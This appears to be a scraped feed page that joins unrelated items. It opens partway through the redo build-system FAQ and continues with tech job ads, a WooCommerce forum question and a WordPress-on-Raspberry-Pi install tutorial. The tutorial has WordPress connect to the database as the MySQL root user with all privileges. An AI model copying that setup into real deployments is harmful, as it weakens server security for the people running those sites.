Note: redo will always change to the directory containing the .do file before trying to build it. So if you do

redo ../utils/foo.o

the ../utils/default.o.do file will be run with its current directory set to ../utils. Thus, the .do file's runtime environment is always reliable.

On the other hand, if you had a file called ../default.o.do, but there was no ../utils/default.o.do, redo would select ../default.o.do as the best matching .do file. It would then run with its current directory set to .., and tell default.o.do to create an output file called "utils/foo.o" (that is, foo.o, with a relative path explaining how to find foo.o when you're starting from the directory containing the .do file).

That sounds a lot more complicated than it is. The results are actually very simple: if you have a toplevel default.o.do, then all your .o files will be compiled with $PWD set to the top level, and all the .o filenames passed as relative paths from $PWD. That way, if you use relative paths in -I and -L gcc options (for example), they will always be correct no matter where in the hierarchy your source files are.

Can I put my .o files in a different directory from my .c files?

Yes. There's nothing in redo that assumes anything about the location of your source files. You can do all sorts of interesting tricks, limited only by your imagination. For example, imagine that you have a toplevel default.o.do that looks like this:

ARCH=${1#out/}
ARCH=${ARCH%%/*}
SRC=${2#out/$ARCH/}
redo-ifchange $SRC.c
$ARCH-gcc -o $3 -c $SRC.c

If you run redo out/i586-mingw32msvc/path/to/foo.o , then the above script would end up running

i586-mingw32msvc-gcc -o $3 -c path/to/foo.c

You could also choose to read the compiler name or options from out/$ARCH/config.sh, or config.$ARCH.sh, or use any other arrangement you want.

You could use the same technique to have separate build directories for out/debug, out/optimized, out/profiled, and so on.

Can my filenames have spaces in them?

Yes, unlike with make. For historical reasons, the Makefile syntax doesn't support filenames with spaces; spaces are used to separate one filename from the next, and there's no way to escape these spaces.

Since redo just uses sh, which has working escape characters and quoting, it doesn't have this problem.

Does redo care about the differences between tabs and spaces?

No.

What if my .c file depends on a generated .h file?

This problem arises as follows. foo.c includes config.h, and config.h is created by running ./configure. The second part is easy; just write a config.h.do that depends on the existence of configure (which is created by configure.do, which probably runs autoconf).

The first part, however, is not so easy. Normally, the headers that a C file depends on are detected as part of the compilation process. That works fine if the headers, themselves, don't need to be generated first. But if you do

redo foo.o

There's no way for redo to automatically know that compiling foo.c into foo.o depends on first generating config.h.

Since most .h files are not auto-generated, the easiest thing to do is probably to just add a line like this to your default.o.do:

redo-ifchange config.h
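
Putting that together with the autodependency-generating default.o.do from earlier, a sketch might look like this:

redo-ifchange config.h $2.c        # make sure config.h is generated before compiling
gcc -MD -MF $2.d -c -o $3 $2.c
read DEPS <$2.d
redo-ifchange ${DEPS#*:}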

Sometimes a specific solution is much easier than a general one.

If you really want to solve the general case, djb has a solution for his own projects , which is a simple script that looks through C files to pull out #include lines. He assumes that #include <file.h> is a system header (thus not subject to being built) and #include "file.h" is in the current directory (thus easy to find). Unfortunately this isn't really a complete solution, but at least it would be able to redo-ifchange a required header before compiling a program that requires that header.
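
A rough sh approximation of that idea (it only understands plain #include "file.h" lines, not conditional or nested includes) might be:

sed -n 's/^#include "\(.*\)"/\1/p' $2.c | xargs redo-ifchange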

Why doesn't redo by default print the commands as they are run?

make prints the commands it runs as it runs them. redo doesn't, although you can get this behaviour with redo -v or redo -x . (The difference between -v and -x is the same as it is in sh... because we simply forward those options onward to sh as it runs your .do script.)

The main reason we don't do this by default is that the commands get pretty long winded (a compiler command line might be multiple lines of repeated gibberish) and, on large projects, it's hard to actually see the progress of the overall build. Thus, make users often work hard to have make hide the command output in order to make the log "more readable."

The reduced output is a pain with make, however, because if there's ever a problem, you're left wondering exactly what commands were run at what time, and you often have to go editing the Makefile in order to figure it out.

With redo, it's much less of a problem. By default, redo produces output that looks like this:

$ redo t
redo  t/all
redo    t/hello
redo      t/LD
redo      t/hello.o
redo        t/CC
redo    t/yellow
redo      t/yellow.o
redo    t/bellow
redo  t/c
redo    t/c.c
redo      t/c.c.c
redo        t/c.c.c.b
redo          t/c.c.c.b.b
redo  t/d

The indentation indicates the level of recursion (deeper levels are dependencies of earlier levels). The repeated word "redo" down the left column looks strange, but it's there for a reason, and the reason is this: you can cut-and-paste a line from the build script and rerun it directly.

$ redo t/c
redo  t/c
redo    t/c.c
redo      t/c.c.c
redo        t/c.c.c.b
redo          t/c.c.c.b.b

So if you ever want to debug what happened at a particular step, you can choose to run only that step in verbose mode:

$ redo t/c.c.c.b.b -x
redo  t/c.c.c.b.b
* sh -ex default.b.do c.c.c.b .b c.c.c.b.b.redo2.tmp
+ redo-ifchange c.c.c.b.b.a
+ echo a-to-b
+ cat c.c.c.b.b.a
+ ./sleep 1.1
redo  t/c.c.c.b.b (done)

If you're using an autobuilder or something that logs build results for future examination, you should probably set it to always run redo with the -x option.

Is redo compatible with autoconf?

Yes. You don't have to do anything special, other than the above note about declaring dependencies on config.h, which is no worse than what you would have to do with make.

Is redo compatible with automake?

Hells no. You can thank me later. But see next question.

Is redo compatible with make?

Yes. If you have an existing Makefile (for example, in one of your subprojects), you can just call make from a .do script to build that subproject.

In a file called myproject.stamp.do:

redo-ifchange $(find myproject -name '*.[ch]')
make -C myproject all

So, to amend our answer to the previous question, you can use automake-generated Makefiles as part of your redo-based project.

Is redo -j compatible with make -j?

Yes! redo implements the same jobserver protocol as GNU make, which means that redo running under make -j, or make running under redo -j, will do the right thing. Thus, it's safe to mix-and-match redo and make in a recursive build system.

Just make sure you declare your dependencies correctly; redo won't know all the specific dependencies included in your Makefile, and make won't know your redo dependencies, of course.

One way of cheating is to just have your make.do script depend on all the source files of a subproject, like this:

make -C subproject all
find subproject -name '*.[ch]' | xargs redo-ifchange

Now if any of the .c or .h files in subproject are changed, your make.do will run, which calls into the subproject to rebuild anything that might be needed. Worst case, if the dependencies are too generous, we end up calling 'make all' more often than necessary. But 'make all' probably runs pretty fast when there's nothing to do, so that's not so bad.

Parallelism if more than one target depends on the same subdir

Recursive make is especially painful when it comes to parallelism. Take a look at this Makefile fragment:

all: fred bob

subproj:
	touch $@.new
	sleep 1
	mv $@.new $@

fred:
	$(MAKE) subproj
	touch $@

bob:
	$(MAKE) subproj
	touch $@

If we run it serially, it all looks good:

$ rm -f subproj fred bob; make --no-print-directory
make subproj
touch subproj.new
sleep 1
mv subproj.new subproj
touch fred
make subproj
make[1]: 'subproj' is up to date.
touch bob

But if we run it in parallel, life sucks:

$ rm -f subproj fred bob; make -j2 --no-print-directory
make subproj
make subproj
touch subproj.new
touch subproj.new
sleep 1
sleep 1
mv subproj.new subproj
mv subproj.new subproj
mv: cannot stat 'subproj.new': No such file or directory
touch fred
make[1]: *** [subproj] Error 1
make: *** [bob] Error 2

What happened? The sub-make that runs subproj ended up getting run twice at once, because both fred and bob need to build it.

If fred and bob had put in a dependency on subproj, then GNU make would be smart enough to only build one of them at a time; it can do ordering inside a single make process. So this example is a bit contrived. But imagine that fred and bob are two separate applications being built from the same toplevel Makefile, and they both depend on the library in subproj. You'd run into this problem if you use recursive make.

Of course, you might try to solve this by using nonrecursive make, but that's really hard. What if subproj is a library from some other vendor? Will you modify all their makefiles to fit into your nonrecursive makefile scheme? Probably not.

Another common workaround is to have the toplevel Makefile build subproj, then fred and bob. This works, but if you don't run the toplevel Makefile and want to go straight to work in the fred project, building fred won't actually build subproj first, and you'll get errors.

redo solves all these problems. It maintains global locks across all its instances, so you're guaranteed that no two instances will try to build subproj at the same time. And this works even if subproj is a make-based project; you just need a simple subproj.do that runs make subproj .
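
A sketch of that arrangement (the library path in fred.do is an assumption):

# subproj.do -- a sketch; redo's locking ensures this runs only once at a time
find subproj -name '*.[ch]' | xargs redo-ifchange
make -C subproj

# fred.do -- a sketch
redo-ifchange subproj fred.o
gcc -o $3 fred.o subproj/libsubproj.a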

Dependency problems that only show up during parallel builds

One annoying thing about parallel builds is... they do more things in parallel. A very common problem in make is to have a Makefile rule that looks like this:

all: a b c

When you make all , it first builds a, then b, then c. What if c depends on b? Well, it doesn't matter when you're building in serial. But with -j3, you end up building a, b, and c at the same time, and the build for c crashes. You should have said:

all: a b c
c: b
b: a

and that would have fixed it. But you forgot, and you don't find out until you build with exactly the wrong -j option.

This mistake is easy to make in redo too. But it does have a tool that helps you debug it: the --shuffle option. --shuffle takes the dependencies of each target, and builds them in a random order. So you can get parallel-like results without actually building in parallel.
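
In redo, the same example is less likely to go wrong in the first place, because each target declares its own dependencies; a sketch:

# all.do
redo-ifchange a b c

# c.do -- c itself says it needs b, so the aggregate target can't forget it
redo-ifchange b
...build c from b...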

What about distributed builds?

FIXME: So far, nobody has tried redo in a distributed build environment. It surely works with distcc, since that's just a distributed compiler. But there are other systems that distribute more of the build process to other machines.

The most interesting method I've heard of was explained (in public, this is not proprietary information) by someone from Google. Apparently, the Android team uses a tool that mounts your entire local filesystem on a remote machine using FUSE and chroots into that directory. Then you replace the $SHELL variable in your copy of make with one that runs this tool. Because the remote filesystem is identical to yours, the build will certainly complete successfully. After the $SHELL program exits, the changed files are sent back to your local machine. Cleverly, the files on the remote server are cached based on their checksums, so files only need to be re-sent if they have changed since last time. This dramatically reduces bandwidth usage compared to, say, distcc (which mostly just re-sends the same preparsed headers over and over again).

At the time, he promised to open source this tool eventually. It would be pretty fun to play with it.

The problem:

This idea won't work as easily with redo as it did with make. With make, a separate copy of $SHELL is launched for each step of the build (and gets migrated to the remote machine), but make runs only on your local machine, so it can control parallelism and avoid building the same target from multiple machines, and so on. The key to the above distribution mechanism is it can send files to the remote machine at the beginning of the $SHELL, and send them back when the $SHELL exits, and know that nobody cares about them in the meantime. With redo, since the entire script runs inside a shell (and the shell might not exit until the very end of the build), we'd have to do the parallelism some other way.

I'm sure it's doable, however. One nice thing about redo is that the source code is so small compared to make: you can just rewrite it.

Can I convince a sub-redo or sub-make to not use parallel builds?

Yes. Put this in your .do script:

unset MAKEFLAGS

The child makes will then not have access to the jobserver, so will build serially instead.

How fast is redo compared to make?

FIXME: The current version of redo is written in python and has not been optimized. So right now, it's usually a bit slower. Not too embarrassingly slower, though, and the slowness mostly only strikes when you're building a project from scratch.

For incrementally building only the changed parts of the project, redo can be much faster than make, because it can check all the dependencies up front and doesn't need to repeatedly parse and re-parse the Makefile (as recursive make needs to do).

redo's sqlite3-based dependency database is very fast (and it would be even faster if we rewrite redo in C instead of python). Better still, it would be possible to write an inotify daemon that can update the dependency database in real time; if you're running the daemon, you can run 'redo' from the toplevel and if your build is clean, it could return instantly, no matter how many dependencies you have.

On my machine, redo can currently check about 10,000 dependencies per second. As an example, a program that depends on every single .c or .h file in the linux kernel 2.6.36 repo (about 36000 files) can be checked in about 4 seconds.

Rewritten in C, dependency checking would probably go about 10 times faster still.

This probably isn't too hard; the design of redo is so simple that it should be easy to write in any language. It's just even easier in python, which was good for writing the prototype and debugging the parallelism and locking rules.

Most of the slowness at the moment is because redo-ifchange (and also sh itself) need to be fork'd and exec'd over and over during the build process.

As a point of reference, on my computer, I can fork-exec redo-ifchange.py about 87 times per second; an empty python program, about 100 times per second; an empty C program, about 1000 times per second; an empty make, about 300 times per second. So if I could compile 87 files per second with gcc, which I can't because gcc is slower than that, then python overhead would be 50%. Since gcc is slower than that, python overhead is generally much less - more like 10%.

Also, if you're using redo -j on a multicore machine, all the python forking happens in parallel with everything else, so that's 87 per second per core. Nevertheless, that's still slower than make and should be fixed.

(On the other hand, all this measurement is confounded because redo's more fine-grained dependencies mean you can have more parallelism. So if you have a lot of CPU cores, redo might build faster than make just because it makes better use of them.)

The output of 'ps ax' is ugly because of the python interpreter!

If the setproctitle module is installed, redo will use it in its script to clean up the displayed title. The module is also available in many distributions. A ps xf output would look like:

...
23461 pts/21   T    0:00  \_ make test
23462 pts/21   T    0:00  |   \_ redo test
23463 pts/21   T    0:00  |       \_ sh -e test.do test test test.redo2.tmp
23464 pts/21   T    0:00  |           \_ redo-ifchange _all
23465 pts/21   T    0:00  |               \_ sh -e _all.do _all _all _all.redo2.tmp
...

Are there examples?

FIXME: There are some limited ones in the t/example/ subdir of the redo project. The best example would be a real, live program using redo as its build process. If you switch your program's build process to use redo, please let us know and we can link to it here.

Please don't take the other tests in t/ as serious examples. Many of them are doing things in deliberately psychotic ways in order to stress redo's code and find bugs.

What's missing? How can I help?

redo is incomplete and probably has numerous bugs. Just what you always wanted in a build system, I know.

What's missing? Search for the word FIXME in this document; anything with a FIXME is something that is either not implemented, or which needs discussion, feedback, or ideas. Of course, there are surely other undocumented things that need discussion or fixes too.

You should join the redo-list@googlegroups.com mailing list.

You can find the mailing list archives here:

http://groups.google.com/group/redo-list

Yes, it might not look like it, but you can subscribe without having a Google Account. Just send a message here:

redo-list+subscribe@googlegroups.com

You can also send a message directly to the mailing list without subscribing first. If you reply to someone on the list, please leave them in the cc: list, since if they haven't subscribed, they won't get your reply otherwise. Nowadays everybody uses a mailer that removes duplicates, so don't worry about sending the same thing to them twice.

Note the plus sign.

Have fun,

Avery


          Wordpress developer      Cache   Translate Page      
WordPress Development o Category and Theme Customization o Customizing Page Template o Custom Plugin Development Thorough knowledge of PHP MySQL Good ability CSS three JavaScript / jQuery WordPress Admin ReactJS or AngularJS For more information: https://jobs-search.org/architecture-construction/wordpress-developer-wanted-in-pune-maharashtra_i664902
          Php developer      Cache   Translate Page      
3 -5yrs of relevant background Excellent Knowledge of PHP web frameworks such as Yii/ Laravel Understanding of MVC design patterns Good understanding of front-end technologies, such as JavaScript, HTML5, and CSS3, bootstrap Knowledge of object oriented PHP programming Thorough knowledge of MySQL Database. Must have hands on background of writing Stored procedures / triggers/ functions. Good...
          Dba and data analytics      Cache   Translate Page      
Required Skill Sound understanding of Database technologies Proficiency in MySQL, NoSQL, Hadoop Strong Data understanding Expertise to write robust, scalable, clean, maintainable and standard code. Application performance Background with Database design Hadoop, Apache Spark, Python Development Tools Defining consistent data architecture and data model Responsibilities Can work unaided Strong...
          Urgent requirement for node js developer pune location in mnc      Cache   Translate Page      
(For initial period of 3 mnths) Job classification 3rd Party Payroll Position Node Js Developer Background 2+ Years Location Viman Nagar (Pune) Primary Skills Backend Nodejs, express.js, meteor.js, sails.js Database NoSQL, MongoDB, MySQL, SQLite Frontend Responsive design, LESS, SaSS, html5, css3, jQuery, bootstrap 3-4 Single Page Application angularjs, reactjs Javascript libraries socket.io,...
          Drupal 8 developer      Cache   Translate Page      
Knowledge of Angular JS, Linux would be an advantage Technical prerequisites PHP, Mysql, OOPs, Jquery, HTML, CSS knowldge is must Knowledge of CMS (Drupal 7, Drupal eight /Typo 3 / WordPress / Joomla For more info: https://jobs-search.org/architecture-construction/drupal-8-developer-wanted-in-pune-maharashtra_i683272
          Php developer      Cache   Translate Page      
Skills we are looking for Background Applicant from 1-2 years - Proficiency in PHP, JavaScript, Jquery, JS libraries , MySQL ,HTML, CSS, Ajax, Boot Strap. - Knowledge of MVC architecture. - Background with RESTful APIs. - Current knowledge of Android/ Ionic framework is a plus. - Prior background in BFSI is a definite plus. Responsibilities and Duties - Hands on with Apache including...
          JR. PHP DEVELOPER - Tenet Systems - Shrirampur, West Bengal      Cache   Translate Page      
Experience: 0-3 yrs Skill: Sound in algorithm Core or Custom Development in either of – PHP, MySQL, JavaScript, AJAX And/or Knowing different other...
From Tenet Systems - Sun, 30 Sep 2018 05:14:16 GMT - View all Shrirampur, West Bengal jobs
          Junior Database Administrator - University of Saskatchewan - Saskatoon, SK      Cache   Translate Page      
PostgreSQL, MySQL, SQL Server, Oracle. The salary range, based on 1.0 FTE, is CAD $48,334.00 - 75,523.00 per annum (Information Technology/Phase 1).... $48,334 - $75,523 a year
From University of Saskatchewan - Wed, 31 Oct 2018 00:18:52 GMT - View all Saskatoon, SK jobs
          Adriod Developer - vikas Global Solutions Ltd - Madhavanpark, Karnataka      Cache   Translate Page      
Android Application Development, Android SDK’s, API, HTML,CSS, MYSQL. Android Application Development. Vikas Global Solutions Ltd....
From Indeed - Mon, 10 Sep 2018 05:26:38 GMT - View all Madhavanpark, Karnataka jobs
          (IT) DataStage Developer - ETL Datastage Developer based in London      Cache   Translate Page      

Rate: £450 - £550 Per Day Umbrella Basis ONLY   Location: London EC4V 6BJ   

DataStage Developer - ETL Datastage Developer based in London My well known Higher Educational client based in Central London is seeking a dynamic, hands on and technically astute IBM Infosphere Data Specialist/Senior ETL Developer, Support & Administrator to lead the design, development and management of reusable, metadata driven, extracts and transformations, using Infosphere Datastage. Main skill set needed is strong Datastage Development. The IBM Infosphere Data Specialist will also lead on the design, development and support for the end to end life cycle of a reusable ETL framework suite and sub components to support batch and Real Time data processing on Information Server and Change Data Delivery platforms Must have skills and experience for the ideal Datastage Developer, Support and Administrator are as follows:.Ability to work closely with the Infrastructure team and source system DBAs to lead on setup of CDD requirements..Lead on support of the installation, configuration and maintenance of CDC components on various Oracle, SQL and MySQL environments..Extensive experience in developing a reusable development suite for creating and maintaining subscriptions based on external metadata..Lead on design and development of replication flows to achieve high throughput and low latency, guaranteed delivery with near zero downtime..Perform Initial data refresh, supporting environment provisioning and build..Data synchronization of Non production environments..Support the test team in building test harness to simulate production like changes to facilitate transaction life cycle testing..Ensure the business and technical requirements are validated, standardized and mastered up to date..Work closely with Business Analysts, System Analysts and Data Modellers to analyse Datamodels and mapping specifications..Lead on the design and development of the ETL components that constitute the overall framework and any bespoke ETL code..Support the end to end life cycle of ETL delivery in an agile fashion. Technical skills:.Must have in depth IBM Infosphere Change Data Capture knowledge and experience with expertise on high volume batch and low latency Real Time data processing..Must have experience in CDC CLI, Java, Datastage BASIC, programming with Information Server APIs..Experience in using Java user exits and knowledge on the CDC Java API..Must have Unix Shell Scripting and Oracle programming skills..Must have good IBM Infosphere Server 11.3.1 knowledge and experience with expertise on high volume batch and low latency Real Time data processing..Must have good experience in Datastage BASIC, C++ for developing parallel engine components, programming with Information Server APIs..Must have Unix Shell Scripting and Oracle programming skills, dimensional modelling knowledge..Experience in Change Data Delivery implementations..Must have proven knowledge and experience in delivering reusable replication framework..Proactively replace manual processes with
 
Rate: £450 - £550 Per Day Umbrella Basis ONLY
Type: Contract
Location: London EC4V 6BJ
Country: UK
Contact: Vincent Galea
Advertiser: Nationwide People Ltd
Email: Vincent.Galea.8BF57.BEA7B@apps.jobserve.com
Start Date: ASAP
Reference: JSVG/ETL/GP/

          Database AWS Engineer (Canton, OH)      Cache   Translate Page      

The Database AWS Engineer is responsible for supporting our Patriot Software organization.  Our systems are currently in SQL Server hosted in multiple Amazon Web Services (AWS) RDS instances but are looking to change the mix with a focus on the cloud and open source.

To be successful in this position, you will not only need to have command of traditional database technologies and associated administration work but will also need to have the proven ability and desire to learn new technologies, such as AWS and services that the organization will potentially utilize.
 

Responsibilities

  • Help develop sustainable data-driven solutions with current database technologies to meet the needs of our organization and business customers
  • Ability to grasp/master new technologies rapidly as needed to progress varied initiatives
  • Able to break down complex data issues and resolve them
  • Builds robust systems with an eye on the long-term maintenance and support of the application
  • Helps drive cross-team design and influencing/development via technical leadership/mentoring
  • Influence cross team/matrix organization
  • Broader knowledge sharing
  • Provide technical guidance to team members
  • Understands complex multi-tier, multi-platform systems

Basic Qualifications

  • At least 3 years of experience in configuring, managing, and troubleshooting SQL Server
  • At least 3 years of experience with database backup and recovery, including implementing disaster recovery standards
  • At least 2 years of experience in AWS cloud computing platform migrating databases to Amazon RDS & EC2
  • At least 3 years of experience with database design, optimization, and tuning
  • At least 2 years of experience using Github
  • At least 2 years of experience in continuous integration and development methodologies tools

Preferred Qualifications

  • Bachelor’s degree in Computer Science or related discipline
  • 2+ years of experience in an Agile development environment
  • Experience translating business requirements to an IT solution.
  • 3+ years of experience in AWS cloud computing platform migrating databases (SQL Server) to Amazon RDS & EC2
  • Experience with Postgres and/or MySQL is a plus.

          PHP Function to change Background of images and store to server .      Cache   Translate Page      
Need a PHP Function to change the Background of images from green to white. Need to have some tolerance. Take a look at the sample images. Well documented code and explanation of how to implement on... (Budget: $10 - $30 USD, Jobs: HTML, Javascript, MySQL, PHP, Software Architecture)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Empty export      Cache   Translate Page      

Replies: 0

Hi, I tried to export the orders but I got an empty CSV file. I tried it twice. The file is 0 KB and cannot be imported.

What could it be?

Status:
WooCommerce version: 3.4.5
WordPress version: 4.9.8
WordPress memory limit: 256 MB

Server
Server info: Apache/2
PHP version: 7.1.21
PHP post max size: 8 MB
PHP time limit: 30
PHP max input vars: 1000
cURL version: 7.60.0, OpenSSL/1.0.2k
MySQL version: 10.1.34-MariaDB
Max upload size: 8 MB


          Autenticando Squid utilizando MySQL      Cache   Translate Page      

This article describes how to make Squid users authenticate against MySQL using MD5 and basic_db_auth.


          How to Set Up WordPress on a Raspberry Pi      Cache   Translate Page      

This simple tutorial gets your own WordPress website running on a Raspberry Pi.

WordPress is a very popular open source blogging platform and content management system (CMS). It is easy to set up, and it has a thriving community of developers building websites and creating themes and plugins for others to use.

Although it is easy to get a hosting package with a one-click WordPress setup, it is also simple to set up your own on a Linux server using only the command line, and the Raspberry Pi is a great way to try it out and learn something along the way.

The four components of a commonly used web stack are Linux, Apache, MySQL, and PHP. Here is what you need to know about each of them.

Linux

The operating system running on the Raspberry Pi is Raspbian, an excellent Linux distribution based on Debian and optimized for the Pi's hardware. You have two options: the desktop version or the lite version. The desktop version has a familiar desktop environment and comes with lots of educational software and programming tools, such as the LibreOffice suite, Minecraft, and a web browser. The lite version has no desktop environment, so it is command line only and ships with just the essential software.

This tutorial works with either version, but if you use the lite version, you will need another computer to access your site.

Apache

Apache is a popular web server application you can install on the Raspberry Pi to serve your web pages. On its own, Apache can serve static HTML files over HTTP. With additional modules, it can serve dynamic web pages using scripting languages such as PHP.

Installing Apache is very simple. Open a terminal window and type the following command:

sudo apt install apache2 -y

By default, Apache puts a test file in a web directory that you can access from your Pi or from any other computer on your network. Just open a web browser and go to <http://localhost>. Alternatively (particularly if you are using Raspbian Lite), enter your Pi's IP address instead of localhost. You should see the default Apache test page in your browser window.

This means your Apache installation is up and running!

This default web page is just a file on your filesystem, located at /var/www/html/index.html. You can use the Leafpad text editor to write some HTML of your own to replace this file's contents:

cd /var/www/html/
sudo leafpad index.html

Save and close Leafpad, then refresh the web page to see your changes.

MySQL

MySQL (pronounced "my S-Q-L" or "my sequel") is a popular database engine. Like PHP, it is very widely used in web hosting, which is why projects such as WordPress use it and why those projects are so popular.

Install the MySQL server by entering the following command in a terminal window (LCTT translator's note: what actually gets installed is MariaDB, a fork of MySQL):

sudo apt-get install mysql-server -y

WordPress uses MySQL to store posts, pages, user data, and lots of other content.

PHP

PHP is a preprocessor: it is code that runs when the server receives a request for a web page via a web browser. It works out what needs to be shown on the page and then sends that page to the browser. Unlike static HTML, PHP can show different content under different circumstances. PHP is a very popular language on the web; huge projects like Facebook and Wikipedia are written in PHP.

Install PHP and the MySQL extension for PHP:

sudo apt-get install php php-mysql -y

Delete the index.html file and create index.php instead:

sudo rm index.html
sudo leafpad index.php

Add the following content to it:

<?php phpinfo(); ?>

Save, exit, and refresh your web page. You will see the PHP status page.

WordPress

You can download WordPress from wordpress.org using the wget command. The latest version of WordPress is always available at wordpress.org/latest.tar.gz, so you can grab it directly without having to look it up on the website; at the time of writing, that is version 4.9.8.

Make sure you are in the /var/www/html directory, then delete everything in it:

cd /var/www/html/
sudo rm *

Download WordPress with wget, then extract the archive and move the contents of the extracted wordpress directory into the html directory:

sudo wget http://wordpress.org/latest.tar.gz
sudo tar xzf latest.tar.gz
sudo mv wordpress/* .

Now you can remove the tarball and the empty wordpress directory:

sudo rm -rf wordpress latest.tar.gz

Running ls or tree -L 1 shows the contents of a WordPress project:

.
├── index.php
├── license.txt
├── readme.html
├── wp-activate.php
├── wp-admin
├── wp-blog-header.php
├── wp-comments-post.php
├── wp-config-sample.php
├── wp-content
├── wp-cron.php
├── wp-includes
├── wp-links-opml.php
├── wp-load.php
├── wp-login.php
├── wp-mail.php
├── wp-settings.php
├── wp-signup.php
├── wp-trackback.php
└── xmlrpc.php

3 directories, 16 files

This is the source of a default WordPress installation. The files you edit to customize your installation live in the wp-content directory.

You should now change the ownership of all these files to the Apache user, www-data:

sudo chown -R www-data: .

The WordPress database

To set up your WordPress site, you need a database. Here, that database is MySQL.

Run the MySQL secure installation command in a terminal window:

sudo mysql_secure_installation

You will be asked a series of questions. There is no password set up initially, but you should set one in the next step. Make sure you remember the password you enter, because you will need it later to connect WordPress to the database. Press Enter to accept the defaults for all the questions that follow.

When it has finished, you will see the messages "All done!" and "Thanks for using MariaDB!".

Run the mysql command in a terminal window:

sudo mysql -uroot -p

Enter the root password you just created (LCTT translator's note: this is the MySQL root password, not the Linux system root password). You will be greeted with the message "Welcome to the MariaDB monitor." At the "MariaDB [(none)] >" prompt, create a database for your WordPress installation with the following command:

create database wordpress;

Note the semicolon at the end of the statement. If the command is successful, you will see the following:

Query OK, 1 row affected (0.00 sec)

Grant database privileges to the root user, entering your password at the end of the statement:

GRANT ALL PRIVILEGES ON wordpress.* TO 'root'@'localhost' IDENTIFIED BY 'YOURPASSWORD';

For the changes to take effect, you will need to flush the database privileges:

FLUSH PRIVILEGES;

Exit the MariaDB prompt with Ctrl+D to return to the Bash shell.
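
Before moving on to the WordPress installer, you can optionally check from PHP that the new database is reachable. The snippet below is a small sketch, not part of the original article: the file name is arbitrary, and whether the root account may log in from PHP with a password depends on how MariaDB is configured on your Pi, so treat the credentials as placeholders for whichever account you actually granted privileges to.

<?php
// Save as /var/www/html/dbcheck.php (hypothetical name) and open http://localhost/dbcheck.php.
// 'root' / 'YOURPASSWORD' are placeholders for the account and password you set up above.
$db = new mysqli('localhost', 'root', 'YOURPASSWORD', 'wordpress');
if ($db->connect_error) {
    die('Connection failed: ' . $db->connect_error);
}
$result = $db->query('SELECT DATABASE() AS db, VERSION() AS version');
$row = $result->fetch_assoc();
echo 'Connected to database "' . $row['db'] . '" on MariaDB/MySQL ' . $row['version'];
$db->close();

Delete the file again once you have seen the confirmation message, so it does not linger on a public-facing server.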

WordPress configuration

Open the web browser on your Raspberry Pi and go to http://localhost. Choose the language you would like WordPress to use and click "Continue". You will then be presented with the WordPress welcome screen. Click the "Let's go!" button.

Fill in the basic site information as follows:

Database Name:      wordpress
User Name:          root
Password:           <YOUR PASSWORD>
Database Host:      localhost
Table Prefix:       wp_

Click "Submit" to proceed, then click "Run the install".

Fill out the form: give your site a title, create a username and password, and enter your email address. Click the "Install WordPress" button, then log in with the account you just created. Now that you are logged in and your site is set up, you can view your website by entering http://localhost/wp-admin in the browser's address bar.
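
For reference (this is a sketch, not part of the original article), the database details you entered a moment ago are written by the installer into wp-config.php in the web root; the generated database constants look roughly like this, with placeholder values standing in for what you actually typed:

<?php
// Rough excerpt of /var/www/html/wp-config.php as generated by the installer (values are placeholders).
define( 'DB_NAME',     'wordpress' );      // the database created at the MariaDB prompt
define( 'DB_USER',     'root' );           // the user you granted privileges to
define( 'DB_PASSWORD', 'YOURPASSWORD' );   // the MySQL root password you chose
define( 'DB_HOST',     'localhost' );      // MariaDB runs on the same Pi
define( 'DB_CHARSET',  'utf8' );
$table_prefix = 'wp_';                     // matches the "Table Prefix" field

If WordPress cannot write the file itself, it shows you the same block so you can save it into wp-config.php by hand.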

Permalinks

It is a good idea to change your permalink settings to make your URLs more friendly.

To do this, log in to WordPress and go to the dashboard. Go to "Settings", then "Permalinks". Select the "Post name" option and click "Save Changes". Next, you need to enable Apache's rewrite module:

sudo a2enmod rewrite

You will also need to tell the virtual host serving the site to allow rewrite requests. Edit the Apache configuration file for your virtual host:

sudo leafpad /etc/apache2/sites-available/000-default.conf

Add the following lines after the first line:

<Directory "/var/www/html">
    AllowOverride All
</Directory>

Make sure the file contains content like this, inside the <VirtualHost *:80> block:

<VirtualHost *:80>
    <Directory "/var/www/html">
        AllowOverride All
    </Directory>
    ...

Save the file and exit, then restart Apache:

sudo systemctl restart apache2

What next?

WordPress is very customizable. By clicking your site name in the banner across the top of the page, you will be taken to the dashboard. From there you can change themes, add pages and posts, edit the menu, add plugins, and do plenty more.

Here are some interesting things you can try on the web server running on your Raspberry Pi:

  • Add pages and posts to your website
  • Install different themes from the Appearance menu
  • Customize your site's theme or create your own
  • Use your web server to display useful information for people on your network

Don't forget, the Raspberry Pi is a Linux computer. You can also follow these same instructions to install WordPress on a server running Debian or Ubuntu.


via: https://opensource.com/article/18/10/setting-wordpress-raspberry-pi

Author: Ben Nuttall; Topic selected by: lujun9972; Translated by: dianbanjiu; Proofread by: wxy

This article was translated by the LCTT project and is proudly presented by Linux中国 (Linux China).


          Серверное применение Linux      Cache   Translate Page      
Серверное применение Linux (Server-Side Applications of Linux)

Server-Side Applications of Linux - describes the configuration of various types of servers: web, FTP, DNS, DHCP, mail, and database servers. It covers in detail the installation and basic configuration of the operating system, setting up the Apache + MySQL + PHP stack, the general structure of Linux, and the basic principles of working with this operating system.
          My Slides about MySQL 8.0 Performance from #OOW18 and #PerconaLIVE 2018      Cache   Translate Page      

As promised, here are slides about MySQL 8.0 Performance from my talks at Oracle Open World 2018 and Percona LIVE Europe 2018 -- all is combined into a single PDF file to give you an overall summary about what we already completed, where we're going in the next updates within our "continuous release", and what kind of performance issues we're digging right now.. ;-))

Also, I'd like to say that both Conferences were simply awesome, and it's great to see a constantly growing level of skills of all MySQL Users attending these Conferences ! -- hope you'll have even more fun with MySQL 8.0 now ;-))


          VueJs-Mid Level Developer-WV - Core10 - Huntington, WV      Cache   Translate Page      
Experience with other database technologies (postgresql, mysql, mssql, mongodb). The Mid Developer is responsible for working as part of a collaborative...
From Core10 - Mon, 15 Oct 2018 05:46:30 GMT - View all Huntington, WV jobs
          NodeJs-Mid Level Developer-WV - Core10 - Huntington, WV      Cache   Translate Page      
Experience with other database technologies (postgresql, mysql, mssql, mongodb). The Mid Developer is responsible for working as part of a collaborative...
